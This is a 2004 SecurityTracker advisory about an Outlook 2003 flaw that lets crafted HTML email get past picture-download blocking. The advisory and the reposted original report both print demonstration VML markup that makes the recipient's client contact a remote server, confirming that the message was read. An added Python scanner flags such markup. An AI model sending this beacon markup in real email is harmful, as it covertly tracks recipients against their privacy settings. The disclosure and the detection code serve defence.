SecurityTracker.com
Category:   Application (E-mail Client)  >   Microsoft Outlook
Vendors:   Microsoft
Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server
SecurityTracker Alert ID:  1010125
SecurityTracker URL:  http://securitytracker.com/id/1010125
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 11 2004
Impact:   Disclosure of user information, Host/resource access via network
Exploit Included:  Yes  
Version(s): Outlook 2003
Description:   A vulnerability was reported in Microsoft Outlook 2003. A remote user can send specially crafted e-mail that, when viewed by the target user, will report back to a remote server that the message has been viewed (even if security measures are in place).

http-equiv reported that a flaw in Microsoft's VML schema implementation for Outlook 2003 lets a remote user effectively bypass the Automatic Picture Download Settings that are intended to prevent remote users from determining if the recipient has viewed a message. A remote user can send a specially crafted HTML e-mail that specifies a VML frame style with a source pointing to the remote user's web site and has the HTML invoke the VML style. The HTML does not need to include a frame. Then, when the target user (recipient) views the message, the target user's Outlook client will contact the specified remote web site, thereby disclosing to the remote user that the message has been viewed.

Some demonstration exploit content is provided:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION:
relative; TOP: 30px; HEIGHT: 200px"
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>

Impact:   A remote user can send e-mail that, when viewed by the target user, will cause the target user's Outlook client to contact the remote user's server (even if the target user has configured Outlook to block remote site downloads).
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Access control error, State error
Underlying OS:  Windows (2000), Windows (2003), Windows (XP)

Message History:   None.
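
With no vendor fix listed, a mail gateway or triage script can flag the pattern described above: a VML-prefixed element whose src points at a remote host. The following Python is an added example, not part of the advisory or the original report; the function names, the sample messages and the tracker.example host are assumptions made for illustration.

```python
import re
from email import message_from_string, policy
from html.parser import HTMLParser

VML_NS = "urn:schemas-microsoft-com:vml"
REMOTE = re.compile(r"\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)  # http://, https://, //host

class VmlScanner(HTMLParser):
    """Collect namespaced elements that carry a remote src attribute."""
    def __init__(self):
        super().__init__()
        self.prefixes = {"v"}   # prefix used in the advisory's sample
        self.candidates = []    # (prefix, tag, src)

    def handle_starttag(self, tag, attrs):  # tag and attribute names arrive lowercased
        a = {k: (v or "") for k, v in attrs}
        if tag == "xml:namespace" and a.get("ns", "").lower() == VML_NS and a.get("prefix"):
            self.prefixes.add(a["prefix"].lower())  # learn non-default VML prefixes
        prefix, colon, _ = tag.partition(":")
        if colon and REMOTE.match(a.get("src", "")):
            self.candidates.append((prefix, tag, a["src"].strip()))

def scan_message(raw):
    """Return [(tag, url)] for VML elements with a remote src in any text/html part."""
    hits = []
    for part in message_from_string(raw, policy=policy.default).walk():
        if part.get_content_type() != "text/html":
            continue
        scanner = VmlScanner()
        scanner.feed(part.get_content())
        scanner.close()
        # Filter after the whole part is parsed: the declaration may follow the element.
        hits += [(t, u) for p, t, u in scanner.candidates if p in scanner.prefixes]
    return hits

# Constructed samples; tracker.example is a placeholder host, not from the advisory.
def make_mail(html):
    return ("Subject: constructed sample\nMIME-Version: 1.0\n"
            'Content-Type: text/html; charset="us-ascii"\n\n' + html)

BEACON = make_mail('<v:vml frame style="WIDTH: 300px"\n'
                   'src = "http://tracker.example/ping.txt#id"></v:vmlframe>\n<HTML><HEAD>'
                   '<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/></HEAD></HTML>')
CLEAN = make_mail('<HTML><BODY><img src="cid:logo"><p>hello</p></BODY></HTML>')

if __name__ == "__main__":
    print(scan_message(BEACON), scan_message(CLEAN))
```

The scanner reports only VML-prefixed elements; ordinary remote images are left to Outlook's own picture-download blocking, which this issue sidesteps.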


 Source Message Contents

Subject:  PING: Outlook 2003 Spam




Tuesday, May 11, 2004

Outlook 2003 the premier mail client from the company 
called 'Microsoft' certainly appears to have a lot of security 
features built into it.  Cursory examination shows excellent 
thought into 'spam' containment, 'security' consideration and 
many other little 'things'. So much so the default rendering of
html is in so-called 'restricted zone' which disallows nearly
everything [frames, iframes, objects, scripting etc.]. In 
addition 'special' spam measures are taken to disallow graphic 
downloads from a remote server in html email which can be used 
to verify recipients:

[screen shot: http://www.malware.com/duhlook.png 40KB]        

The Key Word is: nearly 

Utilising Outlook's own bizarre scheMAH ! which comprises 
a 'proper' frame along with an src pointing to our remote 
server, we are able to ping the server and confirm our recipient 
has viewed our email. We don't require graphics or frames or 
iframes to do that:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: 
relative; TOP: 30px; HEIGHT: 200px" 
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>


Notes:

1. We now commence our examination of the Microsoft Office 2003 
suite, we're a bit late, but it has taken all this time to save 
up to buy the thing
2. Quick 72 hour prodding reveals that this 'perceived' premier 
device known as Outlook 2003 is in fact riddled with holes
3. Do not receive or open any emails period.  Use string and tin 
cans if you must communicate



End Call


-- 
http://www.malware.com
